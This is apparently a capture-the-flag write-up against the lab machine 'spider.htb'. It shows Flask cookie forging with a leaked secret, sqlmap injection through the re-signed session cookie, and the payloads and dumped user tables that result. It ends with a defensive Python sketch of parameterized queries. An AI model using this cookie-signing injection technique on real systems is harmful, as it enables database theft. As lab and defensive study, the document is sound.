3 :80 sqlmap via flask cookie
Using https://book.hacktricks.xyz/pentesting/pentesting-web/flask
$ flask-unsign -d -c 'eyJjYXJ0X2l0ZW1zIjpbXX0.YV43Rg.q_4li1GrgkBKOQe7AbK6R24bxOo' -S 'Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942'
$ flask-unsign --decode --cookie 'eyJjYXJ0X2l0ZW1zIjpbXX0.YV43Rg.q_4li1GrgkBKOQe7AbK6R24bxOo'
{'cart_items': []}
# The last link on that page covers running sqlmap through a Flask session cookie
Using https://book.hacktricks.xyz/pentesting/pentesting-web/flask#sqli-in-flask-session-cookie-with-sqlmap
Using https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap#eval
# Ran it as it was and got errors, then explored and realized it's uuid (not uid).
$ sqlmap http://spider.htb/ --eval "from flask_unsign import session as s; session = s.sign({'uuid': session}, secret='Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942')" --cookie="session=*" --delay 1 --dbs
[*] starting @ 17:28:59 /2021-10-06/
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
[17:29:05] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[17:29:05] [WARNING] provided value for parameter 'session' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[17:29:05] [INFO] testing connection to the target URL
[17:29:07] [INFO] testing if the target URL content is stable
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] n
[17:29:13] [INFO] target URL content is stable
[17:29:13] [INFO] testing if (custom) HEADER parameter 'Cookie #1*' is dynamic
do you want to URL encode cookie values (implementation specific)? [Y/n] Y
[17:29:18] [WARNING] (custom) HEADER parameter 'Cookie #1*' does not appear to be dynamic
[17:29:19] [WARNING] heuristic (basic) test shows that (custom) HEADER parameter 'Cookie #1*' might not be injectable
[17:29:20] [INFO] testing for SQL injection on (custom) HEADER parameter 'Cookie #1*'
[17:29:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:29:32] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[17:29:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[17:29:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:29:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[17:29:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[17:29:57] [INFO] testing 'Generic inline queries'
[17:29:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[17:30:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[17:30:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[17:30:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:30:29] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[17:30:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:30:54] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:31:18] [INFO] target URL appears to be UNION injectable with 1 columns
[17:31:21] [INFO] (custom) HEADER parameter 'Cookie #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: session=' AND (SELECT 6878 FROM (SELECT(SLEEP(5)))Dspl) AND 'xliC'='xliC
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: session=' UNION ALL SELECT CONCAT(0x717a786b71,0x756e616e446a5651496b4662456159494656584b736d77776f554b57787a477867794e4e73644845,0x717a6a6a71)-- -
'
---
[17:31:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.14.0
back-end DBMS: MySQL >= 5.0.12
[17:31:36] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] shop
[*] sys
[17:31:37] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 76 times
[17:31:37] [INFO] fetched data logged to text files under '/home/kashz/.local/share/sqlmap/output/spider.htb'
[*] ending @ 17:31:37 /2021-10-06/
---
# -D shop --tables
[17:32:49] [INFO] fetching tables for database: 'shop'
do you want to URL encode cookie values (implementation specific)? [Y/n] Y
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] n
Database: shop
[4 tables]
+----------+
| items |
| messages |
| support |
| users |
+----------+
# -D shop --dump-all
Database: shop
Table: messages
[1 entry]
+---------+---------+-----------------------------------------------------------------------------------+---------------------+
| post_id | creator | message | timestamp |
+---------+---------+-----------------------------------------------------------------------------------+---------------------+
| 1 | 1 | Fix the <b>/a1836bb97e5f4ce6b3e8f25693c1a16c.unfinished.supportportal</b> portal! | 2020-04-24 15:02:41 |
+---------+---------+-----------------------------------------------------------------------------------+---------------------+
[17:34:56] [INFO] table 'shop.messages' dumped to CSV file '/home/kashz/.local/share/sqlmap/output/spider.htb/dump/shop/messages.csv'
[17:34:56] [INFO] fetching columns for table 'items' in database 'shop'
[17:34:57] [INFO] fetching entries for table 'items' in database 'shop'
Database: shop
Table: items
[6 entries]
+----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+
| id | name | price | image_path | description |
+----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+
| 1 | Chair | 1337 | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. |
| 2 | Black Chair | 1337 | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black. |
| 3 | Chair | 1337 | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. |
| 4 | Black Chair | 1337 | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black. |
| 5 | Chair | 1337 | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. |
| 6 | Black Chair | 1337 | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black. |
+----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+
[17:34:58] [INFO] table 'shop.items' dumped to CSV file '/home/kashz/.local/share/sqlmap/output/spider.htb/dump/shop/items.csv'
[17:34:58] [INFO] fetching columns for table 'users' in database 'shop'
[17:34:59] [INFO] fetching entries for table 'users' in database 'shop'
Database: shop
Table: users
[9 entries]
+----+--------------------------------------+------------+--------------------------------------+
| id | uuid | name | password |
+----+--------------------------------------+------------+--------------------------------------+
| 1 | 129f60ea-30cf-4065-afb9-6be45ad38b73 | chiv | ch1VW4sHERE7331 |
| 2 | 39643204-192c-4bb8-88d2-61dc81de7510 | kashz | kashz |
| 3 | <blank> | hzx"zxc | ddb8ef28-a54a-4da1-b734-f5eff7af2c0f | #"
| 4 | a7e52b68-53d2-4cf2-b072-6aff45d7d31c | ${7*7} | kashz |
| 5 | bb731ee3-c354-46ea-93ad-ce05d99f1f29 | {{7*7}} | kashz |
| 6 | 4459e9dc-f87d-45c8-a0e2-f4480f4a6398 | {{7*7}} | kashz |
| 7 | d8a9109b-4ff2-46e1-bc85-4e77c2ca0c35 | {{10*10}} | kashz |
| 8 | b3d3c283-26c8-4d4a-b7c0-cf1fc000f7bb | {{7*'7'}} | KASHZ |
| 9 | 4480d8e5-eda9-4053-be22-e807f716a45a | {{config}} | kashz |
+----+--------------------------------------+------------+--------------------------------------+
[17:35:00] [INFO] table 'shop.users' dumped to CSV file '/home/kashz/.local/share/sqlmap/output/spider.htb/dump/shop/users.csv'
[17:35:00] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[17:35:00] [INFO] fetched data logged to text files under '/home/kashz/.local/share/sqlmap/output/spider.htb'
[*] ending @ 17:35:00 /2021-10-06/
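
# Defender's note on the finding above: the session signature only shows that the value came from someone holding the secret key; it does not make the uuid inside it safe to put into SQL. The sketch below is an added example, not the target application's code. The table layout, the function names, the sample rows and the sqlite3 backend are all assumptions made so it runs offline.

```python
import sqlite3
import uuid


def make_db():
    """Constructed in-memory stand-in for a users table (sample rows are made up)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, uuid TEXT, name TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [
            (1, "11111111-1111-4111-8111-111111111111", "alice"),
            (2, "22222222-2222-4222-8222-222222222222", "bob"),
        ],
    )
    return db


def lookup_unsafe(db, session):
    """Assumed vulnerable pattern: the session value is concatenated into the SQL text."""
    query = "SELECT name FROM users WHERE uuid = '%s'" % session["uuid"]
    return [row[0] for row in db.execute(query)]


def lookup_safe(db, session):
    """Validate the value as a UUID first, then bind it as a query parameter."""
    try:
        value = str(uuid.UUID(str(session.get("uuid", ""))))
    except ValueError:
        return []  # not a UUID: reject before touching the database
    rows = db.execute("SELECT name FROM users WHERE uuid = ?", (value,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    good = {"uuid": "11111111-1111-4111-8111-111111111111"}
    # Constructed non-UUID value using the quote shape visible in the sqlmap output.
    bad = {"uuid": "' OR 'xliC'='xliC"}
    print("valid uuid   :", lookup_unsafe(db, good), lookup_safe(db, good))
    print("non-uuid text:", lookup_unsafe(db, bad), lookup_safe(db, bad))
```

# The 500 responses counted in the sqlmap run are also a detection signal: a burst of server errors tied to one session cookie is worth alerting on.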